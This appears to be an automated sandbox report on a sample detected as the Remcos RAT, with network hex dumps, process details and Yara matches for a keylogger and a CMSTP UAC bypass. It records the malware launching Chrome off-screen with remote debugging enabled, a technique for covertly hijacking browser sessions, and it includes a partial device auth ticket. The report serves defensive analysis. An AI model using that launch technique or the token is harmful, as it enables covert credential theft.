                                                                                                                                                                                                                                                                                                                            2025-01-05 07:40:35 UTC249OUTData Raw: 3c 63 6f 6e 6e 65 63 74 3e 3c 76 65 72 3e 32 3c 2f 76 65 72 3e 3c 61 67 65 6e 74 3e 3c 6f 73 3e 57 69 6e 64 6f 77 73 3c 2f 6f 73 3e 3c 6f 73 56 65 72 3e 31 30 2e 30 2e 30 2e 30 2e 31 39 30 34 35 3c 2f 6f 73 56 65 72 3e 3c 70 72 6f 63 3e 78 36 34 3c 2f 70 72 6f 63 3e 3c 6c 63 69 64 3e 65 6e 2d 43 48 3c 2f 6c 63 69 64 3e 3c 67 65 6f 49 64 3e 32 32 33 3c 2f 67 65 6f 49 64 3e 3c 61 6f 61 63 3e 30 3c 2f 61 6f 61 63 3e 3c 64 65 76 69 63 65 54 79 70 65 3e 31 3c 2f 64 65 76 69 63 65 54 79 70 65 3e 3c 64 65 76 69 63 65 4e 61 6d 65 3e 56 4d 77 61 72 65 32 30 2c 31 3c 2f 64 65 76 69 63 65 4e 61 6d 65 3e 3c 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 74 72 75 65 3c 2f 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 3c 2f 61 67 65 6e 74 3e 3c 2f 63 6f 6e 6e 65 63 74 3e
                                                                                                                                                                                                                                                                                                                            Data Ascii: <connect><ver>2</ver><agent><os>Windows</os><osVer>10.0.0.0.19045</osVer><proc>x64</proc><lcid>en-CH</lcid><geoId>223</geoId><aoac>0</aoac><deviceType>1</deviceType><deviceName>VMware20,1</deviceName><followRetry>true</followRetry></agent></connect>
                                                                                                                                                                                                                                                                                                                            2025-01-05 07:40:35 UTC1084OUTData Raw: 41 54 48 20 32 20 43 4f 4e 5c 44 45 56 49 43 45 20 31 30 36 31 0d 0a 4d 53 2d 43 56 3a 20 45 55 37 42 68 30 6e 45 47 55 32 37 76 36 6f 68 2e 32 0d 0a 43 6f 6e 74 65 78 74 3a 20 36 63 39 61 37 34 61 30 62 35 39 34 63 63 64 38 0d 0a 0d 0a 3c 64 65 76 69 63 65 3e 3c 63 6f 6d 70 61 63 74 2d 74 69 63 6b 65 74 3e 74 3d 45 77 43 34 41 75 70 49 42 41 41 55 31 62 44 47 66 64 61 7a 69 44 66 58 70 6a 4e 35 4e 36 63 59 68 54 31 77 62 6d 51 41 41 5a 77 54 61 72 59 33 54 42 4f 31 49 66 75 66 6c 35 59 31 63 50 6b 47 50 36 38 74 52 72 2f 6c 41 74 6f 68 31 61 64 61 2b 58 36 6e 5a 52 4c 37 6b 33 57 78 42 77 52 74 6a 68 6d 30 31 4f 70 48 6e 48 41 31 4c 73 46 53 46 65 63 54 67 42 66 58 72 78 41 56 32 58 36 76 78 72 47 7a 46 2f 6c 58 71 6f 62 46 35 66 66 44 70 6b 72 50 69 73
                                                                                                                                                                                                                                                                                                                            Data Ascii: ATH 2 CON\DEVICE 1061MS-CV: EU7Bh0nEGU27v6oh.2Context: 6c9a74a0b594ccd8<device><compact-ticket>t=EwC4AupIBAAU1bDGfdaziDfXpjN5N6cYhT1wbmQAAZwTarY3TBO1Ifufl5Y1cPkGP68tRr/lAtoh1ada+X6nZRL7k3WxBwRtjhm01OpHnHA1LsFSFecTgBfXrxAV2X6vxrGzF/lXqobF5ffDpkrPis
                                                                                                                                                                                                                                                                                                                            2025-01-05 07:40:35 UTC218OUTData Raw: 42 4e 44 20 33 20 43 4f 4e 5c 57 4e 53 20 30 20 31 39 37 0d 0a 4d 53 2d 43 56 3a 20 45 55 37 42 68 30 6e 45 47 55 32 37 76 36 6f 68 2e 33 0d 0a 43 6f 6e 74 65 78 74 3a 20 36 63 39 61 37 34 61 30 62 35 39 34 63 63 64 38 0d 0a 0d 0a 3c 77 6e 73 3e 3c 76 65 72 3e 31 3c 2f 76 65 72 3e 3c 63 6c 69 65 6e 74 3e 3c 6e 61 6d 65 3e 57 50 4e 3c 2f 6e 61 6d 65 3e 3c 76 65 72 3e 31 2e 30 3c 2f 76 65 72 3e 3c 2f 63 6c 69 65 6e 74 3e 3c 6f 70 74 69 6f 6e 73 3e 3c 70 77 72 6d 6f 64 65 20 6d 6f 64 65 3d 22 30 22 3e 3c 2f 70 77 72 6d 6f 64 65 3e 3c 2f 6f 70 74 69 6f 6e 73 3e 3c 6c 61 73 74 4d 73 67 49 64 3e 30 3c 2f 6c 61 73 74 4d 73 67 49 64 3e 3c 2f 77 6e 73 3e
                                                                                                                                                                                                                                                                                                                            Data Ascii: BND 3 CON\WNS 0 197MS-CV: EU7Bh0nEGU27v6oh.3Context: 6c9a74a0b594ccd8<wns><ver>1</ver><client><name>WPN</name><ver>1.0</ver></client><options><pwrmode mode="0"></pwrmode></options><lastMsgId>0</lastMsgId></wns>
                                                                                                                                                                                                                                                                                                                            2025-01-05 07:40:35 UTC14INData Raw: 32 30 32 20 31 20 43 4f 4e 20 35 38 0d 0a
                                                                                                                                                                                                                                                                                                                            Data Ascii: 202 1 CON 58
                                                                                                                                                                                                                                                                                                                            2025-01-05 07:40:35 UTC58INData Raw: 4d 53 2d 43 56 3a 20 2b 6b 30 37 55 54 4b 48 6d 6b 71 5a 52 51 4b 4b 35 55 48 65 6e 41 2e 30 0d 0a 0d 0a 50 61 79 6c 6f 61 64 20 70 61 72 73 69 6e 67 20 66 61 69 6c 65 64 2e
                                                                                                                                                                                                                                                                                                                            Data Ascii: MS-CV: +k07UTKHmkqZRQKK5UHenA.0Payload parsing failed.


                                                                                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                            14192.168.2.65007140.113.110.67443
                                                                                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                            2025-01-05 07:41:06 UTC71OUTData Raw: 43 4e 54 20 31 20 43 4f 4e 20 33 30 35 0d 0a 4d 53 2d 43 56 3a 20 7a 54 31 63 6a 35 6f 62 33 55 79 63 72 59 58 78 2e 31 0d 0a 43 6f 6e 74 65 78 74 3a 20 37 62 66 61 65 34 31 66 64 62 35 62 30 66 62 31 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                            Data Ascii: CNT 1 CON 305MS-CV: zT1cj5ob3UycrYXx.1Context: 7bfae41fdb5b0fb1
                                                                                                                                                                                                                                                                                                                            2025-01-05 07:41:06 UTC249OUTData Raw: 3c 63 6f 6e 6e 65 63 74 3e 3c 76 65 72 3e 32 3c 2f 76 65 72 3e 3c 61 67 65 6e 74 3e 3c 6f 73 3e 57 69 6e 64 6f 77 73 3c 2f 6f 73 3e 3c 6f 73 56 65 72 3e 31 30 2e 30 2e 30 2e 30 2e 31 39 30 34 35 3c 2f 6f 73 56 65 72 3e 3c 70 72 6f 63 3e 78 36 34 3c 2f 70 72 6f 63 3e 3c 6c 63 69 64 3e 65 6e 2d 43 48 3c 2f 6c 63 69 64 3e 3c 67 65 6f 49 64 3e 32 32 33 3c 2f 67 65 6f 49 64 3e 3c 61 6f 61 63 3e 30 3c 2f 61 6f 61 63 3e 3c 64 65 76 69 63 65 54 79 70 65 3e 31 3c 2f 64 65 76 69 63 65 54 79 70 65 3e 3c 64 65 76 69 63 65 4e 61 6d 65 3e 56 4d 77 61 72 65 32 30 2c 31 3c 2f 64 65 76 69 63 65 4e 61 6d 65 3e 3c 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 74 72 75 65 3c 2f 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 3c 2f 61 67 65 6e 74 3e 3c 2f 63 6f 6e 6e 65 63 74 3e
                                                                                                                                                                                                                                                                                                                            Data Ascii: <connect><ver>2</ver><agent><os>Windows</os><osVer>10.0.0.0.19045</osVer><proc>x64</proc><lcid>en-CH</lcid><geoId>223</geoId><aoac>0</aoac><deviceType>1</deviceType><deviceName>VMware20,1</deviceName><followRetry>true</followRetry></agent></connect>
                                                                                                                                                                                                                                                                                                                            2025-01-05 07:41:06 UTC1084OUTData Raw: 41 54 48 20 32 20 43 4f 4e 5c 44 45 56 49 43 45 20 31 30 36 31 0d 0a 4d 53 2d 43 56 3a 20 7a 54 31 63 6a 35 6f 62 33 55 79 63 72 59 58 78 2e 32 0d 0a 43 6f 6e 74 65 78 74 3a 20 37 62 66 61 65 34 31 66 64 62 35 62 30 66 62 31 0d 0a 0d 0a 3c 64 65 76 69 63 65 3e 3c 63 6f 6d 70 61 63 74 2d 74 69 63 6b 65 74 3e 74 3d 45 77 43 34 41 75 70 49 42 41 41 55 31 62 44 47 66 64 61 7a 69 44 66 58 70 6a 4e 35 4e 36 63 59 68 54 31 77 62 6d 51 41 41 5a 77 54 61 72 59 33 54 42 4f 31 49 66 75 66 6c 35 59 31 63 50 6b 47 50 36 38 74 52 72 2f 6c 41 74 6f 68 31 61 64 61 2b 58 36 6e 5a 52 4c 37 6b 33 57 78 42 77 52 74 6a 68 6d 30 31 4f 70 48 6e 48 41 31 4c 73 46 53 46 65 63 54 67 42 66 58 72 78 41 56 32 58 36 76 78 72 47 7a 46 2f 6c 58 71 6f 62 46 35 66 66 44 70 6b 72 50 69 73
                                                                                                                                                                                                                                                                                                                            Data Ascii: ATH 2 CON\DEVICE 1061MS-CV: zT1cj5ob3UycrYXx.2Context: 7bfae41fdb5b0fb1<device><compact-ticket>t=EwC4AupIBAAU1bDGfdaziDfXpjN5N6cYhT1wbmQAAZwTarY3TBO1Ifufl5Y1cPkGP68tRr/lAtoh1ada+X6nZRL7k3WxBwRtjhm01OpHnHA1LsFSFecTgBfXrxAV2X6vxrGzF/lXqobF5ffDpkrPis
                                                                                                                                                                                                                                                                                                                            2025-01-05 07:41:06 UTC218OUTData Raw: 42 4e 44 20 33 20 43 4f 4e 5c 57 4e 53 20 30 20 31 39 37 0d 0a 4d 53 2d 43 56 3a 20 7a 54 31 63 6a 35 6f 62 33 55 79 63 72 59 58 78 2e 33 0d 0a 43 6f 6e 74 65 78 74 3a 20 37 62 66 61 65 34 31 66 64 62 35 62 30 66 62 31 0d 0a 0d 0a 3c 77 6e 73 3e 3c 76 65 72 3e 31 3c 2f 76 65 72 3e 3c 63 6c 69 65 6e 74 3e 3c 6e 61 6d 65 3e 57 50 4e 3c 2f 6e 61 6d 65 3e 3c 76 65 72 3e 31 2e 30 3c 2f 76 65 72 3e 3c 2f 63 6c 69 65 6e 74 3e 3c 6f 70 74 69 6f 6e 73 3e 3c 70 77 72 6d 6f 64 65 20 6d 6f 64 65 3d 22 30 22 3e 3c 2f 70 77 72 6d 6f 64 65 3e 3c 2f 6f 70 74 69 6f 6e 73 3e 3c 6c 61 73 74 4d 73 67 49 64 3e 30 3c 2f 6c 61 73 74 4d 73 67 49 64 3e 3c 2f 77 6e 73 3e
                                                                                                                                                                                                                                                                                                                            Data Ascii: BND 3 CON\WNS 0 197MS-CV: zT1cj5ob3UycrYXx.3Context: 7bfae41fdb5b0fb1<wns><ver>1</ver><client><name>WPN</name><ver>1.0</ver></client><options><pwrmode mode="0"></pwrmode></options><lastMsgId>0</lastMsgId></wns>
                                                                                                                                                                                                                                                                                                                            2025-01-05 07:41:06 UTC14INData Raw: 32 30 32 20 31 20 43 4f 4e 20 35 38 0d 0a
                                                                                                                                                                                                                                                                                                                            Data Ascii: 202 1 CON 58
                                                                                                                                                                                                                                                                                                                            2025-01-05 07:41:06 UTC58INData Raw: 4d 53 2d 43 56 3a 20 58 6d 67 2b 6b 7a 73 46 45 45 43 46 38 43 31 71 33 6c 32 36 41 67 2e 30 0d 0a 0d 0a 50 61 79 6c 6f 61 64 20 70 61 72 73 69 6e 67 20 66 61 69 6c 65 64 2e
                                                                                                                                                                                                                                                                                                                            Data Ascii: MS-CV: Xmg+kzsFEECF8C1q3l26Ag.0Payload parsing failed.


                                                                                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                            15192.168.2.65007240.113.110.67443
                                                                                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                            2025-01-05 07:41:44 UTC71OUTData Raw: 43 4e 54 20 31 20 43 4f 4e 20 33 30 35 0d 0a 4d 53 2d 43 56 3a 20 48 49 47 38 66 79 2b 41 4e 30 47 75 42 6e 70 76 2e 31 0d 0a 43 6f 6e 74 65 78 74 3a 20 61 62 35 34 31 66 36 37 37 38 38 64 38 65 30 34 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                            Data Ascii: CNT 1 CON 305MS-CV: HIG8fy+AN0GuBnpv.1Context: ab541f67788d8e04
                                                                                                                                                                                                                                                                                                                            2025-01-05 07:41:44 UTC249OUTData Raw: 3c 63 6f 6e 6e 65 63 74 3e 3c 76 65 72 3e 32 3c 2f 76 65 72 3e 3c 61 67 65 6e 74 3e 3c 6f 73 3e 57 69 6e 64 6f 77 73 3c 2f 6f 73 3e 3c 6f 73 56 65 72 3e 31 30 2e 30 2e 30 2e 30 2e 31 39 30 34 35 3c 2f 6f 73 56 65 72 3e 3c 70 72 6f 63 3e 78 36 34 3c 2f 70 72 6f 63 3e 3c 6c 63 69 64 3e 65 6e 2d 43 48 3c 2f 6c 63 69 64 3e 3c 67 65 6f 49 64 3e 32 32 33 3c 2f 67 65 6f 49 64 3e 3c 61 6f 61 63 3e 30 3c 2f 61 6f 61 63 3e 3c 64 65 76 69 63 65 54 79 70 65 3e 31 3c 2f 64 65 76 69 63 65 54 79 70 65 3e 3c 64 65 76 69 63 65 4e 61 6d 65 3e 56 4d 77 61 72 65 32 30 2c 31 3c 2f 64 65 76 69 63 65 4e 61 6d 65 3e 3c 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 74 72 75 65 3c 2f 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 3c 2f 61 67 65 6e 74 3e 3c 2f 63 6f 6e 6e 65 63 74 3e
                                                                                                                                                                                                                                                                                                                            Data Ascii: <connect><ver>2</ver><agent><os>Windows</os><osVer>10.0.0.0.19045</osVer><proc>x64</proc><lcid>en-CH</lcid><geoId>223</geoId><aoac>0</aoac><deviceType>1</deviceType><deviceName>VMware20,1</deviceName><followRetry>true</followRetry></agent></connect>
                                                                                                                                                                                                                                                                                                                            2025-01-05 07:41:44 UTC1084OUTData Raw: 41 54 48 20 32 20 43 4f 4e 5c 44 45 56 49 43 45 20 31 30 36 31 0d 0a 4d 53 2d 43 56 3a 20 48 49 47 38 66 79 2b 41 4e 30 47 75 42 6e 70 76 2e 32 0d 0a 43 6f 6e 74 65 78 74 3a 20 61 62 35 34 31 66 36 37 37 38 38 64 38 65 30 34 0d 0a 0d 0a 3c 64 65 76 69 63 65 3e 3c 63 6f 6d 70 61 63 74 2d 74 69 63 6b 65 74 3e 74 3d 45 77 43 34 41 75 70 49 42 41 41 55 31 62 44 47 66 64 61 7a 69 44 66 58 70 6a 4e 35 4e 36 63 59 68 54 31 77 62 6d 51 41 41 5a 77 54 61 72 59 33 54 42 4f 31 49 66 75 66 6c 35 59 31 63 50 6b 47 50 36 38 74 52 72 2f 6c 41 74 6f 68 31 61 64 61 2b 58 36 6e 5a 52 4c 37 6b 33 57 78 42 77 52 74 6a 68 6d 30 31 4f 70 48 6e 48 41 31 4c 73 46 53 46 65 63 54 67 42 66 58 72 78 41 56 32 58 36 76 78 72 47 7a 46 2f 6c 58 71 6f 62 46 35 66 66 44 70 6b 72 50 69 73
                                                                                                                                                                                                                                                                                                                            Data Ascii: ATH 2 CON\DEVICE 1061MS-CV: HIG8fy+AN0GuBnpv.2Context: ab541f67788d8e04<device><compact-ticket>t=EwC4AupIBAAU1bDGfdaziDfXpjN5N6cYhT1wbmQAAZwTarY3TBO1Ifufl5Y1cPkGP68tRr/lAtoh1ada+X6nZRL7k3WxBwRtjhm01OpHnHA1LsFSFecTgBfXrxAV2X6vxrGzF/lXqobF5ffDpkrPis
                                                                                                                                                                                                                                                                                                                            2025-01-05 07:41:44 UTC218OUTData Raw: 42 4e 44 20 33 20 43 4f 4e 5c 57 4e 53 20 30 20 31 39 37 0d 0a 4d 53 2d 43 56 3a 20 48 49 47 38 66 79 2b 41 4e 30 47 75 42 6e 70 76 2e 33 0d 0a 43 6f 6e 74 65 78 74 3a 20 61 62 35 34 31 66 36 37 37 38 38 64 38 65 30 34 0d 0a 0d 0a 3c 77 6e 73 3e 3c 76 65 72 3e 31 3c 2f 76 65 72 3e 3c 63 6c 69 65 6e 74 3e 3c 6e 61 6d 65 3e 57 50 4e 3c 2f 6e 61 6d 65 3e 3c 76 65 72 3e 31 2e 30 3c 2f 76 65 72 3e 3c 2f 63 6c 69 65 6e 74 3e 3c 6f 70 74 69 6f 6e 73 3e 3c 70 77 72 6d 6f 64 65 20 6d 6f 64 65 3d 22 30 22 3e 3c 2f 70 77 72 6d 6f 64 65 3e 3c 2f 6f 70 74 69 6f 6e 73 3e 3c 6c 61 73 74 4d 73 67 49 64 3e 30 3c 2f 6c 61 73 74 4d 73 67 49 64 3e 3c 2f 77 6e 73 3e
                                                                                                                                                                                                                                                                                                                            Data Ascii: BND 3 CON\WNS 0 197MS-CV: HIG8fy+AN0GuBnpv.3Context: ab541f67788d8e04<wns><ver>1</ver><client><name>WPN</name><ver>1.0</ver></client><options><pwrmode mode="0"></pwrmode></options><lastMsgId>0</lastMsgId></wns>
                                                                                                                                                                                                                                                                                                                            2025-01-05 07:41:44 UTC14INData Raw: 32 30 32 20 31 20 43 4f 4e 20 35 38 0d 0a
                                                                                                                                                                                                                                                                                                                            Data Ascii: 202 1 CON 58
                                                                                                                                                                                                                                                                                                                            2025-01-05 07:41:44 UTC58INData Raw: 4d 53 2d 43 56 3a 20 56 30 50 6b 4a 30 69 61 2f 45 69 55 6e 36 2f 4e 63 6d 30 51 7a 67 2e 30 0d 0a 0d 0a 50 61 79 6c 6f 61 64 20 70 61 72 73 69 6e 67 20 66 61 69 6c 65 64 2e
                                                                                                                                                                                                                                                                                                                            Data Ascii: MS-CV: V0PkJ0ia/EiUn6/Ncm0Qzg.0Payload parsing failed.


                                                                                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                            16192.168.2.65007340.113.110.67443
                                                                                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                            2025-01-05 07:42:37 UTC71OUTData Raw: 43 4e 54 20 31 20 43 4f 4e 20 33 30 35 0d 0a 4d 53 2d 43 56 3a 20 54 43 73 61 78 38 52 51 6e 6b 79 69 45 7a 75 4f 2e 31 0d 0a 43 6f 6e 74 65 78 74 3a 20 35 34 62 38 30 62 37 38 36 38 38 66 32 61 62 35 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                            Data Ascii: CNT 1 CON 305MS-CV: TCsax8RQnkyiEzuO.1Context: 54b80b78688f2ab5
                                                                                                                                                                                                                                                                                                                            2025-01-05 07:42:37 UTC249OUTData Raw: 3c 63 6f 6e 6e 65 63 74 3e 3c 76 65 72 3e 32 3c 2f 76 65 72 3e 3c 61 67 65 6e 74 3e 3c 6f 73 3e 57 69 6e 64 6f 77 73 3c 2f 6f 73 3e 3c 6f 73 56 65 72 3e 31 30 2e 30 2e 30 2e 30 2e 31 39 30 34 35 3c 2f 6f 73 56 65 72 3e 3c 70 72 6f 63 3e 78 36 34 3c 2f 70 72 6f 63 3e 3c 6c 63 69 64 3e 65 6e 2d 43 48 3c 2f 6c 63 69 64 3e 3c 67 65 6f 49 64 3e 32 32 33 3c 2f 67 65 6f 49 64 3e 3c 61 6f 61 63 3e 30 3c 2f 61 6f 61 63 3e 3c 64 65 76 69 63 65 54 79 70 65 3e 31 3c 2f 64 65 76 69 63 65 54 79 70 65 3e 3c 64 65 76 69 63 65 4e 61 6d 65 3e 56 4d 77 61 72 65 32 30 2c 31 3c 2f 64 65 76 69 63 65 4e 61 6d 65 3e 3c 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 74 72 75 65 3c 2f 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 3c 2f 61 67 65 6e 74 3e 3c 2f 63 6f 6e 6e 65 63 74 3e
                                                                                                                                                                                                                                                                                                                            Data Ascii: <connect><ver>2</ver><agent><os>Windows</os><osVer>10.0.0.0.19045</osVer><proc>x64</proc><lcid>en-CH</lcid><geoId>223</geoId><aoac>0</aoac><deviceType>1</deviceType><deviceName>VMware20,1</deviceName><followRetry>true</followRetry></agent></connect>
                                                                                                                                                                                                                                                                                                                            2025-01-05 07:42:37 UTC1084OUTData Raw: 41 54 48 20 32 20 43 4f 4e 5c 44 45 56 49 43 45 20 31 30 36 31 0d 0a 4d 53 2d 43 56 3a 20 54 43 73 61 78 38 52 51 6e 6b 79 69 45 7a 75 4f 2e 32 0d 0a 43 6f 6e 74 65 78 74 3a 20 35 34 62 38 30 62 37 38 36 38 38 66 32 61 62 35 0d 0a 0d 0a 3c 64 65 76 69 63 65 3e 3c 63 6f 6d 70 61 63 74 2d 74 69 63 6b 65 74 3e 74 3d 45 77 43 34 41 75 70 49 42 41 41 55 31 62 44 47 66 64 61 7a 69 44 66 58 70 6a 4e 35 4e 36 63 59 68 54 31 77 62 6d 51 41 41 5a 77 54 61 72 59 33 54 42 4f 31 49 66 75 66 6c 35 59 31 63 50 6b 47 50 36 38 74 52 72 2f 6c 41 74 6f 68 31 61 64 61 2b 58 36 6e 5a 52 4c 37 6b 33 57 78 42 77 52 74 6a 68 6d 30 31 4f 70 48 6e 48 41 31 4c 73 46 53 46 65 63 54 67 42 66 58 72 78 41 56 32 58 36 76 78 72 47 7a 46 2f 6c 58 71 6f 62 46 35 66 66 44 70 6b 72 50 69 73
                                                                                                                                                                                                                                                                                                                            Data Ascii: ATH 2 CON\DEVICE 1061MS-CV: TCsax8RQnkyiEzuO.2Context: 54b80b78688f2ab5<device><compact-ticket>t=EwC4AupIBAAU1bDGfdaziDfXpjN5N6cYhT1wbmQAAZwTarY3TBO1Ifufl5Y1cPkGP68tRr/lAtoh1ada+X6nZRL7k3WxBwRtjhm01OpHnHA1LsFSFecTgBfXrxAV2X6vxrGzF/lXqobF5ffDpkrPis
                                                                                                                                                                                                                                                                                                                            2025-01-05 07:42:37 UTC218OUTData Raw: 42 4e 44 20 33 20 43 4f 4e 5c 57 4e 53 20 30 20 31 39 37 0d 0a 4d 53 2d 43 56 3a 20 54 43 73 61 78 38 52 51 6e 6b 79 69 45 7a 75 4f 2e 33 0d 0a 43 6f 6e 74 65 78 74 3a 20 35 34 62 38 30 62 37 38 36 38 38 66 32 61 62 35 0d 0a 0d 0a 3c 77 6e 73 3e 3c 76 65 72 3e 31 3c 2f 76 65 72 3e 3c 63 6c 69 65 6e 74 3e 3c 6e 61 6d 65 3e 57 50 4e 3c 2f 6e 61 6d 65 3e 3c 76 65 72 3e 31 2e 30 3c 2f 76 65 72 3e 3c 2f 63 6c 69 65 6e 74 3e 3c 6f 70 74 69 6f 6e 73 3e 3c 70 77 72 6d 6f 64 65 20 6d 6f 64 65 3d 22 30 22 3e 3c 2f 70 77 72 6d 6f 64 65 3e 3c 2f 6f 70 74 69 6f 6e 73 3e 3c 6c 61 73 74 4d 73 67 49 64 3e 30 3c 2f 6c 61 73 74 4d 73 67 49 64 3e 3c 2f 77 6e 73 3e
                                                                                                                                                                                                                                                                                                                            Data Ascii: BND 3 CON\WNS 0 197MS-CV: TCsax8RQnkyiEzuO.3Context: 54b80b78688f2ab5<wns><ver>1</ver><client><name>WPN</name><ver>1.0</ver></client><options><pwrmode mode="0"></pwrmode></options><lastMsgId>0</lastMsgId></wns>
                                                                                                                                                                                                                                                                                                                            2025-01-05 07:42:37 UTC14INData Raw: 32 30 32 20 31 20 43 4f 4e 20 35 38 0d 0a
                                                                                                                                                                                                                                                                                                                            Data Ascii: 202 1 CON 58
                                                                                                                                                                                                                                                                                                                            2025-01-05 07:42:37 UTC58INData Raw: 4d 53 2d 43 56 3a 20 78 43 59 73 66 34 4a 56 6e 45 43 50 4b 38 71 4f 31 62 6a 44 77 67 2e 30 0d 0a 0d 0a 50 61 79 6c 6f 61 64 20 70 61 72 73 69 6e 67 20 66 61 69 6c 65 64 2e
                                                                                                                                                                                                                                                                                                                            Data Ascii: MS-CV: xCYsf4JVnECPK8qO1bjDwg.0Payload parsing failed.


                                                                                                                                                                                                                                                                                                                            Statistics

                                                                                                                                                                                                                                                                                                                            CPU Usage

                                                                                                                                                                                                                                                                                                                            Click to jump to process

                                                                                                                                                                                                                                                                                                                            Memory Usage

                                                                                                                                                                                                                                                                                                                            Click to jump to process

                                                                                                                                                                                                                                                                                                                            High Level Behavior Distribution

                                                                                                                                                                                                                                                                                                                            Click to dive into process behavior distribution

                                                                                                                                                                                                                                                                                                                            Behavior

                                                                                                                                                                                                                                                                                                                            Click to jump to process

                                                                                                                                                                                                                                                                                                                            System Behavior

                                                                                                                                                                                                                                                                                                                            General

                                                                                                                                                                                                                                                                                                                            Target ID:0
                                                                                                                                                                                                                                                                                                                            Start time:02:38:59
                                                                                                                                                                                                                                                                                                                            Start date:05/01/2025
                                                                                                                                                                                                                                                                                                                            Path:C:\Users\user\Desktop\17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exe
                                                                                                                                                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                                                            Commandline:"C:\Users\user\Desktop\17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exe"
                                                                                                                                                                                                                                                                                                                            Imagebase:0x400000
                                                                                                                                                                                                                                                                                                                            File size:493'056 bytes
                                                                                                                                                                                                                                                                                                                            MD5 hash:41496241AE1AD7C561D749F7D479CAFF
                                                                                                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                            Yara matches:
                                                                                                                                                                                                                                                                                                                            • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000000.00000002.4568387682.00000000007CE000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                                                            • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000000.00000002.4564159338.0000000000457000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                                                            • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000000.00000002.4564159338.0000000000457000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                                                            • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000000.00000002.4564159338.0000000000457000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                                                            • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000000.00000002.4564159338.0000000000457000.00000002.00000001.01000000.00000003.sdmp, Author: unknown
                                                                                                                                                                                                                                                                                                                            • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000000.00000000.2113712556.0000000000457000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                                                            • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000000.00000000.2113712556.0000000000457000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                                                            • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000000.00000000.2113712556.0000000000457000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                                                            • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000000.00000000.2113712556.0000000000457000.00000002.00000001.01000000.00000003.sdmp, Author: unknown
                                                                                                                                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                                                                                                                                            Has exited:false

                                                                                                                                                                                                                                                                                                                            General

                                                                                                                                                                                                                                                                                                                            Target ID:3
                                                                                                                                                                                                                                                                                                                            Start time:02:39:02
                                                                                                                                                                                                                                                                                                                            Start date:05/01/2025
                                                                                                                                                                                                                                                                                                                            Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                                            Commandline:--user-data-dir=C:\Users\user\AppData\Local\Temp\TmpUserData --window-position=-2400,-2400 --remote-debugging-port=9222 --profile-directory="Default"
                                                                                                                                                                                                                                                                                                                            Imagebase:0x7ff684c40000
                                                                                                                                                                                                                                                                                                                            File size:3'242'272 bytes
                                                                                                                                                                                                                                                                                                                            MD5 hash:5BBFA6CBDF4C254EB368D534F9E23C92
                                                                                                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                            Reputation:high
                                                                                                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                                                                                                            General

                                                                                                                                                                                                                                                                                                                            Target ID:4
                                                                                                                                                                                                                                                                                                                            Start time:02:39:03
                                                                                                                                                                                                                                                                                                                            Start date:05/01/2025
                                                                                                                                                                                                                                                                                                                            Path:C:\Users\user\Desktop\17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exe
                                                                                                                                                                                                                                                                                                                            Wow64 process (32bit):true
